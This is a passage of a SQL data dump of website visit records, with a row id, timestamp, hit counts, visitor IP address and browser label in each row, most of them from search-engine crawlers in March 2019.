36.149.36','other'),(402775,1553173871,1,1,0,0,'66.249.66.58','chrome'),(402776,1553173896,1,1,0,0,'95.163.255.45','other'),(402777,1553174135,1,1,0,0,'54.36.150.80','other'),(402778,1553174453,1,1,0,0,'95.163.255.46','other'),(402779,1553174722,1,1,0,0,'95.163.255.42','other'),(402780,1553174793,1,1,0,0,'54.36.148.165','other'),(402781,1553174952,1,1,0,0,'54.36.148.40','other'),(402782,1553174958,1,1,0,0,'46.229.168.137','other'),(402783,1553175308,1,1,0,0,'95.135.245.144','firefox'),(402784,1553175482,1,1,0,0,'54.36.148.1','other'),(402785,1553175485,1,1,0,0,'46.229.168.150','other'),(402786,1553175493,1,1,0,0,'54.36.150.79','other'),(402787,1553175930,1,1,0,0,'54.36.148.61','other'),(402788,1553176025,1,1,0,0,'95.134.168.235','chrome'),(402789,1553176490,1,1,0,0,'46.229.168.129','other'),(402790,1553176658,1,1,0,0,'46.229.168.138','other'),(402791,1553176792,1,1,0,0,'54.36.150.60','other'),(402792,1553176889,1,1,0,0,'54.36.148.174','other'),(402793,1553177119,1,1,0,0,'54.36.150.121','other'),(402794,1553177159,1,1,0,0,'54.36.148.239','other'),(402795,1553177487,1,1,0,0,'54.36.150.165','other'),(402796,1553177661,1,1,0,0,'46.229.168.129','other'),(402797,1553177688,1,1,0,0,'95.134.168.235','chrome'),(402798,1553177693,1,1,0,0,'95.163.255.48','other'),(402799,1553177764,1,1,0,0,'95.163.255.44','other'),(402800,1553177894,1,1,0,0,'95.163.255.47','other'),(402801,1553178115,1,1,0,0,'95.163.255.42','other'),(402802,1553178214,2,2,0,0,'216.244.66.241','other'),(402803,1553178232,1,1,0,0,'54.36.148.144','other'),(402804,1553178584,1,1,0,0,'46.229.168.140','other'),(402805,1553178635,1,1,0,0,'5.188.210.51','chrome'),(402806,1553178711,1,1,0,0,'95.163.255.46','other'),(402807,1553179215,1,1,0,0,'46.211.49.236','chrome'),(402808,1553179269,1,1,0,0,'54.36.150.19','other'),(402809,1553179306,2,2,0,0,'95.163.255.45','other'),(402810,1553179449,1,1,0,0,'95.132.15.3','chrome'),(402811,1553179537,1,1,0,0,'66.249.66.136','chrome'),(402812,1553179592,1,1,0,0,'54.36.150.0','other'),(402813,1553179615,1,1,0,0,'54.36.150.179','other'),(402814,1553179804,1,1,0,0,'46.229.168.136','other'),(402815,1553180147,1,1,0,0,'95.134.202.37','chrome'),(402816,1553180190,1,1,0,0,'109.122.59.1','chrome'),(402817,1553180390,1,1,0,0,'54.36.150.154','other'),(402818,1553180401,1,1,0,0,'213.180.203.17','other'),(402819,1553180421,1,1,0,0,'37.9.113.38','other'),(402820,1553180427,1,1,0,0,'54.36.150.112','other'),(402821,1553180429,7,7,0,0,'46.211.124.63','chrome'),(402822,1553180449,1,1,0,0,'54.36.148.34','other'),(402823,1553180567,1,1,0,0,'54.36.150.34','other'),(402824,1553180960,1,1,0,0,'178.154.171.17','other'),(402825,1553181003,1,1,0,0,'46.229.168.152','other'),(402826,1553181038,1,1,0,0,'8.29.198.26','other'),(402827,1553181049,1,1,0,0,'31.184.238.175','chrome'),(402828,1553181052,1,1,0,0,'8.29.198.25','other'),(402829,1553181328,1,1,0,0,'46.229.168.132','other'),(402830,1553181343,1,1,0,0,'46.229.168.143','other'),(402831,1553181872,1,1,0,0,'54.36.150.105','other'),(402832,1553181931,1,1,0,0,'5.255.253.16','other'),(402833,1553181963,1,1,0,0,'54.36.148.0','other'),(402834,1553181968,1,1,0,0,'178.154.244.49','other'),(402835,1553182185,1,1,0,0,'46.229.168.150','other'),(402836,1553182224,1,1,0,0,'213.180.203.17','other'),(402837,1553182755,2,2,0,0,'66.249.66.138','chrome'),(402838,1553182765,1,1,0,0,'54.36.150.178','other'),(402839,1553183106,1,1,0,0,'54.36.150.172','other'),(402840,1553183111,1,1,0,0,'54.36.148.144','other'),(402841,1553183304,3,3,0,0,'95.163.255.49','other'),(402842,1553183585,1,1,0,0,'54.36.148.66','other'),(402843,1553183587,1,1,0,0,'216.244.66.241','other'),(402844,1553183615,1,1,0,0,'54.36.148.187','other'),(402845,1553183642,2,2,0,0,'95.163.255.44','other'),(402846,1553183685,1,1,0,0,'54.36.150.139','other'),(402847,1553183859,1,1,0,0,'54.36.149.62','other'),(402848,1553183889,1,1,0,0,'95.163.255.42','other'),(402849,1553184126,1,1,0,0,'54.36.150.66','other'),(402850,1553184361,1,1,0,0,'178.154.200.8','other'),(402851,1553184661,1,1,0,0,'46.229.168.136','other'),(402852,1553184844,1,1,0,0,'54.36.150.169','other'),(402853,1553184985,1,1,0,0,'46.229.168.154','other'),(402854,1553185206,1,1,0,0,'54.36.99.140','firefox'),(402855,1553185235,1,1,0,0,'95.163.255.42','other'),(402856,1553185759,1,1,0,0,'54.36.148.103','other'),(402857,1553186524,1,1,0,0,'207.46.13.56','other'),(402858,1553186607,2,2,0,0,'87.250.224.47','other'),(402859,1553186955,1,1,0,0,'5.45.207.76','other'),(402860,1553187180,1,1,0,0,'178.154.200.8','other'),(402861,1553187260,2,2,0,0,'5.45.207.19','other'),(402862,1553187351,1,1,0,0,'54.36.149.95','other'),(402863,1553187380,2,2,0,0,'37.9.113.38','other'),(402864,1553187446,1,1,0,0,'37.9.113.20','other'),(402865,1553187465,1,1,0,0,'5.255.253.25','other'),(402866,1553187568,2,2,0,0,'141.8.142.65','other'),(402867,1553187609,1,1,0,0,'46.229.168.138','other'),(402868,1553187690,1,1,0,0,'46.229.168.134','other'),(402869,1553187934,1,1,0,0,'141.8.142.162','other'),(402870,1553187935,1,1,0,0,'5.45.207.80','other'),(402871,1553188031,1,1,0,0,'46.229.168.153','other'),(402872,1553188075,1,1,0,0,'54.36.150.34','other'),(402873,1553188401,1,1,0,0,'54.36.150.48','other'),(402874,1553188988,1,1,0,0,'95.163.255.46','other'),(402875,1553189080,1,1,0,0,'95.163.255.49','other'),(402876,1553189216,1,1,0,0,'95.163.255.47','other'),(402877,1553189433,1,1,0,0,'46.229.168.147','other'),(402878,1553189776,1,1,0,0,'95.163.255.45','other'),(402879,1553191238,1,1,0,0,'95.163.255.46','other'),(402880,1553191331,1,1,0,0,'13.66.139.0','other'),(402881,1553191502,1,1,0,0,'46.229.168.154','other'),(402882,1553191510,1,1,0,0,'82.145.210.37','other'),(402883,1553191593,1,1,0,0,'216.244.66.241','other'),(402884,1553191895,2,2,0,0,'8.29.198.26','other'),(402885,1553192796,1,1,0,0,'87.250.224.65','other'),(402886,1553193863,1,1,0,0,'95.132.19.55','chrome'),(402887,1553193971,1,1,0,0,'5.255.253.25','other'),(402888,1553194089,1,1,0,0,'37.9.113.20','other'),(402889,1553194134,1,1,0,0,'178.154.200.8','other'),(402890,1553194331,1,1,0,0,'95.163.255.47','other'),(402891,1553194467,1,1,0,0,'141.8.142.103','other'),(402892,1553194477,1,1,0,0,'46.229.168.152','other'),(402893,1553194512,1,1,0,0,'95.163.255.44','other'),(402894,1553194646,2,2,0,0,'95.163.255.46','other'),(402895,1553194765,1,1,0,0,'95.163.255.42','other'),(402896,1553195751,1,1,0,0,'95.163.255.45','other'),(402897,1553196154,1,1,0,0,'5.255.253.22','other'),(402898,1553196178,1,1,0,0,'95.163.255.44','other'),(402899,1553196241,1,1,0,0,'5.45.207.19','other'),(402900,1553196308,1,1,0,0,'95.163.255.43','other'),(402901,1553196777,1,1,0,0,'213.180.203.17','other'),(402902,1553196876,2,2,0,0,'141.8.142.162','other'),(402903,1553196903,1,1,0,0,'141.8.142.103','other'),(402904,1553196997,1,1,0,0,'207.46.13.48','other'),(402905,1553197034,1,1,0,0,'37.9.113.20','other'),(402906,1553197178,1,1,0,0,'91.196.178.44','chrome'),(402907,1553197224,1,1,0,0,'216.244.66.241','other'),(402908,1553197297,1,1,0,0,'178.154.171.24','other'),(402909,1553197313,1,1,0,0,'213.180.203.40','other'),(402910,1553197323,1,1,0,0,'178.154.171.17','other'),(402911,1553197354,1,1,0,0,'40.77.167.151','other'),(402912,1553197777,1,1,0,0,'46.48.13.161','firefox'),(402913,1553197908,1,1,0,0,'66.249.66.134','chrome'),(402914,1553199728,1,1,0,0,'95.163.255.47','other'),(402915,1553199929,1,1,0,0,'95.163.255.44','other'),(402916,1553200024,1,1,0,0,'46.211.44.5','other'),(402917,1553200231,2,2,0,0,'95.163.255.42','other'),(402918,1553200256,1,1,0,0,'5.255.253.25','other'),(402919,1553200441,1,1,0,0,'95.163.255.48','other'),(402920,1553200817,2,2,0,0,'95.163.255.43','other'),(402921,1553201151,2,2,0,0,'207.46.13.48','other'),(402922,1553201188,1,1,0,0,'40.77.167.151','other'),(402923,1553202339,1,1,0,0,'95.163.255.47','other'),(402924,1553202356,1,1,0,0,'95.163.255.45','other'),(402925,1553202511,1,1,0,0,'95.163.255.42','other'),(402926,1553202756,1,1,0,0,'8.29.198.27','other'),(402927,1553202761,1,1,0,0,'8.29.198.26','other'),(402928,1553203226,1,1,0,0,'207.46.13.89','other'),(402929,1553203304,1,1,0,0,'46.229.168.134','other'),(402930,1553204305,1,1,0,0,'40.77.167.150','other'),(402931,1553205011,2,2,0,0,'95.163.255.45','other'),(402932,1553205058,2,2,0,0,'31.184.238.251','chrome'),(402933,1553205136,2,2,0,0,'95.163.255.42','other'),(402934,1553205194,1,1,0,0,'40.77.167.151','other'),(402935,1553205253,3,3,0,0,'95.163.255.48','other'),(402936,1553205784,1,1,0,0,'66.249.66.138','chrome'),(402937,1553205801,1,1,0,0,'95.163.255.43','other'),(402938,1553205941,1,1,0,0,'95.163.255.44','other'),(402939,1553206000,1,1,0,0,'46.229.168.144','other'),(402940,1553206223,1,1,0,0,'95.163.255.47','other'),(402941,1553206541,1,1,0,0,'46.229.168.146','other'),(402942,1553206577,1,1,0,0,'178.154.171.24','other'),(402943,1553206676,1,1,0,0,'141.8.183.23','other'),(402944,1553206944,1,1,0,0,'5.45.207.19','other'),(402945,1553206973,1,1,0,0,'207.46.13.228','other'),(402946,1553207206,2,2,0,0,'157.55.39.233','other'),(402947,1553207242,1,1,0,0,'66.249.66.134','chrome'),(402948,1553207296,1,1,0,0,'95.163.255.43','other'),(402949,1553207320,1,1,0,0,'46.229.168.152','other'),(402950,1553207946,1,1,0,0,'95.163.255.45','other'),(402951,1553208287,1,1,0,0,'37.73.195.97','chrome'),(402952,1553208319,1,1,0,0,'87.250.224.47','other'),(402953,1553208605,1,1,0,0,'37.73.232.100','other'),(402954,1553208802,1,1,0,0,'207.46.13.228','other'),(402955,1553209092,1,1,0,0,'46.229.168.138','other'),(402956,1553209154,1,1,0,0,'46.229.168.150','other'),(402957,1553209293,1,0,1,0,'66.249.66.134',''),(402958,1553210895,2,2,0,0,'95.163.255.49','other'),(402959,1553211003,1,1,0,0,'95.163.255.45','other'),(402960,1553211120,1,1,0,0,'66.249.66.138','chrome'),(402961,1553211152,1,1,0,0,'95.163.255.48','other'),(402962,1553211718,1,1,0,0,'95.163.255.42','other'),(402963,1553212837,2,2,0,0,'95.163.255.46','other'),(402964,1553213476,1,1,0,0,'46.229.168.138','other'),(402965,1553213595,2,2,0,0,'8.29.198.27','other'),(402966,1553213768,1,1,0,0,'141.8.142.65','other'),(402967,1553213973,1,1,0,0,'95.108.181.83','other'),(402968,1553214427,1,1,0,0,'46.48.13.161','firefox'),(402969,1553214707,1,1,0,0,'178.154.244.65','other'),(402970,1553214721,1,1,0,0,'109.201.152.27','other'),(402971,1553215252,1,1,0,0,'46.229.168.135','other'),(402972,1553215657,1,1,0,0,'66.249.66.138','chrome'),(402973,1553216192,2,2,0,0,'95.163.255.48','other'),(402974,1553216714,1,1,0,0,'95.163.255.43','other'),(402975,1553216808,1,1,0,0,'95.163.255.46','other'),(402976,1553217092,1,1,0,0,'95.163.255.44','other'),(402977,1553217193,1,1,0,0,'95.163.255.47','other'),(402978,1553217258,1,1,0,0,'66.249.66.136','chrome'),(402979,1553218129,1,1,0,0,'216.244.66.241','other'),(402980,1553218188,1,1,0,0,'95.163.255.42','other'),(402981,1553218757,1,1,0,0,'95.163.255.43','other'),(402982,1553219309,1,1,0,0,'46.229.168.140','other'),(402983,1553219729,1,1,0,0,'157.55.39.131','other'),(402984,1553219848,1,1,0,0,'46.229.168.154','other'),(402985,1553220024,1,1,0,0,'46.229.168.149','other'),(402986,1553220314,1,1,0,0,'5.45.207.79','other'),(402987,1553220321,1,1,0,0,'216.244.66.241','other'),(402988,1553220964,1,1,0,0,'141.8.142.191','other'),(402989,1553221037,1,1,0,0,'46.229.168.149','other'),(402990,1553221101,1,1,0,0,'46.229.168.151','other'),(402991,1553221128,1,1,0,0,'66.249.66.134','chrome'),(402992,1553221303,1,1,0,0,'46.229.168.152','other'),(402993,1553221794,1,1,0,0,'95.163.255.44','other'),(402994,1553222028,1,1,0,0,'46.229.168.136','other'),(402995,1553222054,1,1,0,0,'178.154.244.65','other'),(402996,1553222841,1,1,0,0,'46.229.168.148','other'),(402997,1553222862,1,1,0,0,'46.229.168.140','other'),(402998,1553223334,1,1,0,0,'216.244.66.241','other'),(402999,1553224449,1,1,0,0,'8.29.198.26','other'),(403000,1553224454,1,1,0,0,'8.29.198.25','other'),(403001,1553224508,1,1,0,0,'141.8.183.23','other'),(403002,1553224594,2,2,0,0,'207.46.13.46','other'),(403003,1553224755,1,1,0,0,'66.249.66.138','chrome'),(403004,1553225279,1,1,0,0,'46.229.168.142','other'),(403005,1553225931,2,2,0,0,'157.55.39.135','other'),(403006,1553226407,1,1,0,0,'46.229.168.129','other'),(403007,1553226505,1,1,0,0,'46.229.168.135','other'),(403008,1553226715,1,1,0,0,'66.249.66.58','chrome'),(403009,1553226762,1,1,0,0,'95.108.181.83','other'),(403010,1553226953,1,1,0,0,'95.108.181.94','other'),(403011,1553227196,2,2,0,0,'46.211.69.163','chrome'),(403012,1553227440,1,1,0,0,'46.229.168.144','other'),(403013,1553227455,1,1,0,0,'213.180.203.61','other'),(403014,1553227499,1,1,0,0,'46.229.168.141','other'),(403015,1553227560,1,1,0,0,'141.8.183.11','other'),(403016,1553227620,1,1,0,0,'95.163.255.48','other'),(403017,1553227852,1,1,0,0,'95.163.255.49','other'),(403018,1553228529,1,1,0,0,'46.229.168.132','other'),(403019,1553228891,1,1,0,0,'54.36.150.107','other'),(403020,1553228942,1,1,0,0,'54.36.149.4','other'),(403021,1553229124,1,1,0,0,'207.46.13.46','other'),(403022,1553229153,1,1,0,0,'157.55.39.74','other'),(403023,1553229385,1,1,0,0,'46.229.168.148','other'),(403024,1553229801,1,1,0,0,'54.36.148.25','other'),(403025,1553229842,1,1,0,0,'54.36.150.124','other'),(403026,1553230268,1,1,0,0,'54.36.150.20','other'),(403027,1553230837,1,1,0,0,'54.36.150.189','other'),(403028,1553230952,1,1,0,0,'180.76.15.157','other'),(403029,1553231086,1,1,0,0,'54.36.150.80','other'),(403030,1553231111,1,1,0,0,'46.229.168.136','other'),(403031,1553231422,1,1,0,0,'54.36.150.68','other'),(403032,1553231648,1,1,0,0,'54.36.148.198','other'),(403033,1553231692,1,1,0,0,'54.36.150.61','other'),(403034,1553232133,1,1,0,0,'207.46.13.204','other'),(403035,1553232231,1,1,0,0,'178.154.171.24','other'),(403036,1553232259,1,1,0,0,'54.36.150.183','other'),(403037,1553232622,1,1,0,0,'178.154.200.8','other'),(403038,1553233008,1,1,0,0,'54.36.149.27','other'),(403039,1553233203,1,1,0,0,'54.36.148.27','other'),(403040,1553233478,1,1,0,0,'54.36.149.107','other'),(403041,1553233630,1,1,0,0,'54.36.149.28','other'),(403042,1553233744,1,1,0,0,'54.36.148.190','other'),(403043,1553233791,1,1,0,0,'54.36.149.58','other'),(403044,1553233917,1,1,0,0,'54.36.148.52','other'),(403045,1553234310,1,1,0,0,'157.55.39.74','other'),(403046,1553234325,1,1,0,0,'213.180.203.40','other'),(403047,1553234328,1,1,0,0,'178.154.171.69','other'),(403048,1553234381,1,1,0,0,'54.36.148.125','other'),(403049,1553234428,1,1,0,0,'54.36.148.58','other'),(403050,1553234543,1,1,0,0,'34.221.124.19','other'),(403051,1553234595,1,1,0,0,'46.48.13.161','chrome'),(403052,1553234618,1,1,0,0,'54.36.150.171','other'),(403053,1553234650,1,1,0,0,'5.255.253.16','other'),(403054,1553234654,1,1,0,0,'141.8.142.144','other'),(403055,1553234802,1,1,0,0,'54.36.150.6','other'),(403056,1553234887,1,1,0,0,'54.36.149.5','other'),(403057,1553235053,1,1,0,0,'54.36.149.2','other'),(403058,1553235137,1,1,0,0,'87.250.224.118','other'),(403059,1553235140,1,1,0,0,'95.108.181.83','other'),(403060,1553235165,1,1,0,0,'213.180.203.48','other'),(403061,1553235292,2,2,0,0,'8.29.198.25','other'),(403062,1553235317,1,1,0,0,'178.154.244.21','other'),(403063,1553235333,1,1,0,0,'178.154.200.48','other'),(403064,1553235414,1,1,0,0,'95.108.181.57','other'),(403065,1553235640,1,1,0,0,'180.76.15.134','other'),(403066,1553235779,2,2,0,0,'188.239.230.208','firefox'),(403067,1553235816,1,1,0,0,'137.74.167.96','other'),(403068,1553235858,1,1,0,0,'91.196.178.93','chrome'),(403069,1553236602,1,1,0,0,'66.249.66.62','chrome'),(403070,1553236720,2,2,0,0,'35.166.195.144','chrome'),(403071,1553237015,1,1,0,0,'157.55.39.169','other'),(403072,1553237433,1,1,0,0,'54.36.149.71','other'),(403073,1553237688,1,1,0,0,'46.229.168.151','other'),(403074,1553237869,1,1,0,0,'91.196.178.90','chrome'),(403075,1553238039,1,1,0,0,'54.36.148.117','other'),(403076,1553238111,1,1,0,0,'46.229.168.148','other'),(403077,1553238140,1,1,0,0,'141.8.142.191','other'),(403078,1553238173,1,1,0,0,'87.250.224.99','other'),(403079,1553238432,1,1,0,0,'91.196.178.186','chrome'),(403080,1553238478,1,1,0,0,'54.36.149.79','other'),(403081,1553238486,1,1,0,0,'66.249.66.136','chrome'),(403082,1553238874,1,1,0,0,'157.55.39.74','other'),(403083,1553239272,1,1,0,0,'95.163.255.44','other'),(403084,1553239291,1,1,0,0,'54.36.150.178','other'),(403085,1553239519,1,1,0,0,'91.196.177.46','chrome'),(403086,1553239566,1,1,0,0,'66.249.66.136','chrome'),(403087,1553239611,1,1,0,0,'66.249.66.134','chrome'),(403088,1553240122,1,1,0,0,'54.36.149.90','other'),(403089,1553240302,1,1,0,0,'109.74.154.72','chrome'),(403090,1553240344,1,1,0,0,'54.36.150.83','other'),(403091,1553240490,1,1,0,0,'95.163.255.45','other'),(403092,1553240560,1,1,0,0,'54.36.150.88','other'),(403093,1553240623,1,1,0,0,'92.113.116.206','chrome'),(403094,1553240858,1,1,0,0,'37.52.20.221','chrome'),(403095,1553241240,1,1,0,0,'54.36.148.131','other'),(403096,1553241278,1,1,0,0,'54.36.148.173','other'),(403097,1553241399,1,1,0,0,'54.36.150.130','other'),(403098,1553241450,1,1,0,0,'40.77.167.101','other'),(403099,1553241481,1,1,0,0,'180.163.220.4','chrome'),(403100,1553241576,1,1,0,0,'95.163.255.42','other'),(403101,1553241607,1,1,0,0,'54.36.149.99','other'),(403102,1553241650,1,1,0,0,'54.36.148.171','other'),(403103,1553241906,1,1,0,0,'54.36.149.12','other'),(403104,1553242180,1,1,0,0,'54.36.150.114','other'),(403105,1553242184,1,1,0,0,'180.163.220.4','other'),(403106,1553242256,1,1,0,0,'180.76.15.11','other'),(403107,1553242280,1,1,0,0,'54.36.150.129','other'),(403108,1553242661,1,1,0,0,'54.36.148.164','other'),(403109,1553243165,1,1,0,0,'157.55.39.169','other'),(403110,1553243328,1,1,0,0,'54.36.150.20','other'),(403111,1553243535,1,1,0,0,'3.82.100.232','firefox'),(403112,1553243684,1,1,0,0,'54.36.150.51','other'),(403113,1553243879,1,1,0,0,'54.36.148.65','other'),(403114,1553244031,1,1,0,0,'95.132.22.40','firefox'),(403115,1553244333,1,1,0,0,'54.36.148.138','other'),(403116,1553244579,1,1,0,0,'91.124.182.170','firefox'),(403117,1553244585,1,1,0,0,'54.36.149.83','other'),(403118,1553244777,1,1,0,0,'46.229.168.144','other'),(403119,1553245115,1,1,0,0,'54.36.149.29','other'),(403120,1553245265,1,1,0,0,'5.45.207.19','other'),(403121,1553245367,1,1,0,0,'46.229.168.146','other'),(403122,1553245397,1,1,0,0,'37.9.113.38','other'),(403123,1553245441,1,1,0,0,'87.250.224.99','other'),(403124,1553245465,2,2,0,0,'87.250.224.47','other'),(403125,1553245499,1,1,0,0,'95.163.255.44','other'),(403126,1553245605,1,1,0,0,'95.108.181.83','other'),(403127,1553245610,1,1,0,0,'95.133.60.158','chrome'),(403128,1553245616,1,1,0,0,'95.108.181.94','other'),(403129,1553245706,1,1,0,0,'91.196.178.93','chrome'),(403130,1553245928,1,1,0,0,'178.154.171.69','other'),(403131,1553246024,1,1,0,0,'66.249.66.136','chrome'),(403132,1553246143,1,1,0,0,'8.29.198.26','other'),(403133,1553246147,1,1,0,0,'8.29.198.25','other'),(403134,1553246190,1,1,0,0,'178.154.200.48','other'),(403135,1553246191,1,1,0,0,'213.180.203.40','other'),(403136,1553246296,1,1,0,0,'178.154.200.8','other'),(403137,1553246332,1,1,0,0,'37.9.113.148','other'),(403138,1553246528,1,1,0,0,'87.250.224.99','other'),(403139,1553246530,1,1,0,0,'95.108.213.4','other'),(403140,1553246532,1,1,0,0,'54.36.148.211','other'),(403141,1553246571,1,1,0,0,'37.9.113.38','other'),(403142,1553246578,1,1,0,0,'54.36.150.47','other'),(403143,1553246584,1,1,0,0,'54.36.150.154','other'),(403144,1553246607,1,1,0,0,'87.250.224.47','other'),(403145,1553246664,1,1,0,0,'157.55.39.74','other'),(403146,1553246832,1,1,0,0,'46.229.168.149','other'),(403147,1553247098,1,1,0,0,'46.229.168.141','other'),(403148,1553247407,1,1,0,0,'91.196.178.93','chrome'),(403149,1553247541,1,1,0,0,'54.36.150.110','other'),(403150,1553247548,14,14,0,0,'157.55.39.58','other'),(403151,1553247561,1,1,0,0,'54.36.150.171','other'),(403152,1553247641,1,1,0,0,'54.36.148.6','other'),(403153,1553247659,1,1,0,0,'66.249.66.134','chrome'),(403154,1553247707,18,18,0,0,'40.77.167.101','other'),(403155,1553247998,1,1,0,0,'54.36.150.84','other'),(403156,1553248006,15,15,0,0,'157.55.39.169','other'),(403157,1553248053,1,1,0,0,'37.53.90.175','chrome'),(403158,1553248188,1,1,0,0,'54.36.148.61','other'),(403159,1553248383,1,1,0,0,'54.36.148.229','other'),(403160,1553248536,1,1,0,0,'91.196.178.93','chrome'),(403161,1553248579,1,1,0,0,'54.36.150.28','other'),(403162,1553248592,1,1,0,0,'91.196.178.186','chrome'),(403163,1553249244,1,1,0,0,'95.134.202.37','chrome'),(403164,1553249436,1,1,0,0,'54.36.148.156','other'),(403165,1553249699,1,1,0,0,'88.135.215.163','chrome'),(403166,1553250573,1,1,0,0,'54.36.149.94','other'),(403167,1553250836,1,1,0,0,'62.149.16.175','chrome'),(403168,1553250840,1,1,0,0,'95.163.255.43','other'),(403169,1553251356,1,1,0,0,'178.92.137.177','firefox'),(403170,1553251407,1,1,0,0,'46.229.168.142','other'),(403171,1553251812,1,1,0,0,'180.76.15.15','other'),(403172,1553251850,1,1,0,0,'46.229.168.147','other'),(403173,1553252147,1,1,0,0,'40.77.167.0','other'),(403174,1553252272,1,1,0,0,'82.145.212.5','other'),(403175,1553252515,1,1,0,0,'54.36.149.68','other'),(403176,1553252776,1,1,0,0,'54.36.150.144','other'),(403177,1553252898,3,3,0,0,'5.9.98.234','other'),(403178,1553253315,1,1,0,0,'54.36.150.133','other'),(403179,1553253319,1,1,0,0,'46.229.168.147','other'),(403180,1553253323,1,1,0,0,'46.229.168.151','other'),(403181,1553253440,1,1,0,0,'54.36.150.6','other'),(403182,1553253583,2,2,0,0,'13.52.98.113','other'),(403183,1553253833,2,2,0,0,'46.229.168.144','other'),(403184,1553253834,1,1,0,0,'54.36.150.37','other'),(403185,1553254967,1,1,0,0,'54.36.148.234','other'),(403186,1553255038,2,2,0,0,'40.77.167.0','other'),(403187,1553255364,1,1,0,0,'107.21.1.8','other'),(403188,1553255366,1,1,0,0,'54.208.102.37','other'),(403189,1553255375,1,1,0,0,'72.35.247.137','firefox'),(403190,1553255383,1,1,0,0,'46.229.168.135','other'),(403191,1553255441,1,1,0,0,'54.36.150.55','other'),(403192,1553255705,1,1,0,0,'46.229.168.152','other'),(403193,1553255991,1,1,0,0,'54.36.149.16','other'),(403194,1553256133,69,69,0,0,'5.9.144.234','other'),(403195,1553256451,1,1,0,0,'40.77.167.0','other'),(403196,1553256514,1,1,0,0,'95.163.255.45','other'),(403197,1553256539,2,2,0,0,'157.55.39.58','other'),(403198,1553256572,1,1,0,0,'91.196.178.133','chrome'),(403199,1553256603,1,1,0,0,'188.239.230.208','chrome'),(403200,1553256626,1,1,0,0,'54.36.150.23','other'),(403201,1553256696,1,1,0,0,'54.36.150.128','other'),(403202,1553256761,1,1,0,0,'95.163.255.43','other'),(403203,1553256859,1,1,0,0,'54.36.148.29','other'),(403204,1553256878,2,2,0,0,'178.154.244.11','other'),(403205,1553256998,2,2,0,0,'8.29.198.27','other'),(403206,1553257015,1,1,0,0,'37.54.184.4','chrome'),(403207,1553257074,1,1,0,0,'5.45.207.79','other'),(403208,1553257079,2,2,0,0,'5.45.207.19','other'),(403209,1553257130,1,1,0,0,'87.250.224.65','other'),(403210,1553257309,1,1,0,0,'54.36.150.92','other'),(403211,1553257428,2,2,0,0,'141.8.142.103','other'),(403212,1553257429,1,1,0,0,'95.108.213.4','other'),(403213,1553257520,1,1,0,0,'87.250.224.81','other'),(403214,1553257671,1,1,0,0,'37.9.113.148','other'),(403215,1553257747,1,1,0,0,'54.36.150.137','other'),(403216,1553258139,1,1,0,0,'5.45.207.79','other'),(403217,1553258285,1,1,0,0,'40.77.167.0','other'),(403218,1553258397,1,1,0,0,'54.36.148.189','other'),(403219,1553258435,1,1,0,0,'54.36.150.18','other'),(403220,1553258514,1,1,0,0,'178.154.244.11','other'),(403221,1553258773,1,1,0,0,'46.229.168.141','other'),(403222,1553259096,1,1,0,0,'31.43.13.173','chrome'),(403223,1553259112,1,1,0,0,'180.163.220.5','chrome'),(403224,1553259131,1,1,0,0,'42.236.10.124','chrome'),(403225,1553259161,1,1,0,0,'42.236.10.92','other'),(403226,1553259164,1,1,0,0,'66.249.66.60','chrome'),(403227,1553259542,1,1,0,0,'37.53.90.175','chrome'),(403228,1553259840,1,1,0,0,'54.36.149.38','other'),(403229,1553260063,1,1,0,0,'54.36.148.54','other'),(403230,1553260091,1,1,0,0,'46.229.168.147','other'),(403231,1553260437,1,1,0,0,'46.229.168.152','other'),(403232,1553260500,1,1,0,0,'91.196.178.87','chrome'),(403233,1553260976,1,1,0,0,'66.249.66.134','chrome'),(403234,1553260995,1,1,0,0,'54.36.150.142','other'),(403235,1553261044,1,1,0,0,'54.36.150.30','other'),(403236,1553261263,1,1,0,0,'46.211.133.6','chrome'),(403237,1553261650,1,1,0,0,'54.36.150.123','other'),(403238,1553261852,1,1,0,0,'54.36.148.224','other'),(403239,1553261872,1,1,0,0,'5.45.207.79','other'),(403240,1553261904,1,1,0,0,'54.36.148.82','other'),(403241,1553262097,1,1,0,0,'176.116.77.52','chrome'),(403242,1553262281,1,1,0,0,'54.36.148.25','other'),(403243,1553262613,1,1,0,0,'91.196.178.91','firefox'),(403244,1553262624,1,1,0,0,'42.236.10.75','chrome'),(403245,1553262663,1,1,0,0,'42.236.10.117','chrome'),(403246,1553262697,1,1,0,0,'54.36.148.211','other'),(403247,1553262734,1,1,0,0,'40.77.167.143','other'),(403248,1553262767,1,1,0,0,'46.229.168.150','other'),(403249,1553263146,1,1,0,0,'46.229.168.139','other'),(403250,1553263195,1,1,0,0,'54.36.148.5','other'),(403251,1553263259,1,1,0,0,'54.36.148.32','other'),(403252,1553263402,1,1,0,0,'54.36.148.131','other'),(403253,1553263417,1,1,0,0,'51.255.65.46','other'),(403254,1553263508,1,1,0,0,'157.55.39.58','other'),(403255,1553263520,1,1,0,0,'91.196.178.91','firefox'),(403256,1553263534,1,1,0,0,'42.236.10.92','chrome'),(403257,1553263688,1,1,0,0,'54.36.150.69','other'),(403258,1553263775,1,1,0,0,'95.163.255.47','other'),(403259,1553263942,1,1,0,0,'54.36.150.147','other'),(403260,1553264039,1,1,0,0,'46.229.168.140','other'),(403261,1553264836,1,1,0,0,'54.36.150.81','other'),(403262,1553264884,1,1,0,0,'54.36.149.14','other'),(403263,1553265132,1,1,0,0,'46.229.168.145','other'),(403264,1553265213,1,1,0,0,'54.36.148.158','other'),(403265,1553265296,1,1,0,0,'54.36.150.104','other'),(403266,1553265374,1,1,0,0,'54.36.148.159','other'),(403267,1553265419,1,0,1,0,'51.68.152.26',''),(403268,1553265606,1,1,0,0,'54.36.149.17','other'),(403269,1553265693,1,1,0,0,'54.36.150.84','other'),(403270,1553265695,1,1,0,0,'46.229.168.133','other'),(403271,1553265727,1,1,0,0,'109.201.154.227','other'),(403272,1553265906,1,1,0,0,'54.36.148.66','other'),(403273,1553266353,1,1,0,0,'54.36.148.194','other'),(403274,1553266578,1,1,0,0,'46.229.168.130','other'),(403275,1553267268,1,1,0,0,'46.211.133.6','chrome'),(403276,1553267422,1,1,0,0,'54.36.148.71','other'),(403277,1553267841,1,1,0,0,'8.29.198.27','other'),(403278,1553267863,1,1,0,0,'8.29.198.25','other'),(403279,1553268060,1,1,0,0,'178.154.244.11','other'),(403280,1553268061,1,1,0,0,'95.108.213.4','other'),(403281,1553268695,1,1,0,0,'54.36.148.143','other'),(403282,1553268744,1,1,0,0,'66.249.66.136','chrome'),(403283,1553269017,2,2,0,0,'95.163.255.43','other'),(403284,1553269310,1,1,0,0,'54.36.148.117','other'),(403285,1553269341,1,1,0,0,'54.36.149.38','other'),(403286,1553269834,1,1,0